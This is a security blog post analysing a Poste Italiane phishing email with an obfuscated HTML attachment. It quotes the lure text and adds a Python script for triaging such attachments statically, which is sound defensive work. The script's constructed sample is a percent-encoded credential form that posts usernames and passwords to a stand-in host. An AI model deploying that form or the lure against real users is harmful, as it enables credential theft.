OFFICIAL SECURITY BLOG
June 30, 2014 | BY Christopher Boyd
Currently landing in mailboxes: a Poste Italiane phish asking for username and password information.
The potentially somewhat off-kilter Google Translation reads as follows:
Dear customer Poste.it,
A new range of online services is now available!
To take advantage of the new online services Poste.it must first become VERIFIED USER.
We will include the necessary documentation to enable protection.
The client, after receiving the documents and verifying their completeness and accuracy, will immediately activate your “User Name Verified.” You will be notified by telephone of such activation.
They placed a typo in the From field – “Poste Italiene”, instead of “Italiane”. As for the meat of the mail itself, the phish comes in the form of an HTML attachment designed to be opened in the victim’s browser.
They’ve attempted to hide the code used in the HTML file by using a free web-based encryption tool – other evasion tactics have been seen before where Poste Italiane phishes are concerned.
Unfortunately for them, this isn’t enough to deter anybody even mildly curious about what lurks inside the code.
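For mail triage, an attachment like this can be inspected without ever opening it in a browser. The sketch below is an added example, not code from this post or from the phish itself: it assumes the common `unescape('...')` percent-encoding wrapper that many free HTML "encryption" pages produce (the post does not say which tool was used), and the sample attachment and host name are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import quote, unquote, urlparse

# Assumed wrapper: unescape('...%XX...') or decodeURIComponent("..."), as emitted
# by many free HTML "encryption" pages. %uXXXX escapes are not handled here.
WRAPPED = re.compile(r"""(?:unescape|decodeURIComponent)\(\s*(['"])(.*?)\1\s*\)""", re.S)

class FormFinder(HTMLParser):
    """Collects form targets and password inputs; no script is ever executed."""
    def __init__(self):
        super().__init__()
        self.actions, self.password_fields = [], 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1

def peel(html, max_layers=5):
    """Return each statically decoded layer, outermost first."""
    layers, current = [], html
    for _ in range(max_layers):
        found = [unquote(m.group(2)) for m in WRAPPED.finditer(current)]
        if not found:
            break
        current = "\n".join(found)
        layers.append(current)
    return layers

def triage(attachment_html):
    """Summarise where an HTML attachment would send credentials."""
    layers = peel(attachment_html)
    finder = FormFinder()
    for text in [attachment_html, *layers]:
        finder.reset()  # clear parser state left over from the previous layer
        finder.feed(text)
        finder.close()
    hosts = sorted({urlparse(u).hostname or "" for u in finder.actions} - {""})
    return {"obfuscated_layers": len(layers), "post_hosts": hosts,
            "password_fields": finder.password_fields}

# Constructed sample (not from the real spam run): a credential form hidden
# behind one layer of percent-encoding.
INNER = ('<form action="http://compromised.example/poste/login.php" method="post">'
         '<input name="user"><input type="password" name="pass"></form>')
SAMPLE = ("<html><body><script>document.write(unescape('"
          + quote(INNER, safe="") + "'));</script></body></html>")
```

A non-zero `obfuscated_layers` together with a password field is a strong signal for quarantine, and the `post_hosts` list gives the sites to report for cleanup.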
It looks like the spammers are using hacked sites in this spam run, though fortunately they appear to be in the process of being cleaned up.
Even so, recipients of these mails should steer clear of clicking links inside attachments, or entering their user details on supplied forms. In fact, opening attachments at all from suspicious emails should be a no-go given the possibility of them being loaded up with exploits.
Phishing with attachments is a popular hobby for scammers, and we shouldn’t make it worth their while – if your webmail doesn’t detect the spam by default, report it and add it to your blocklist.
Additionally, you can always report Poste Italiane phishes to CERT di Poste Italiane.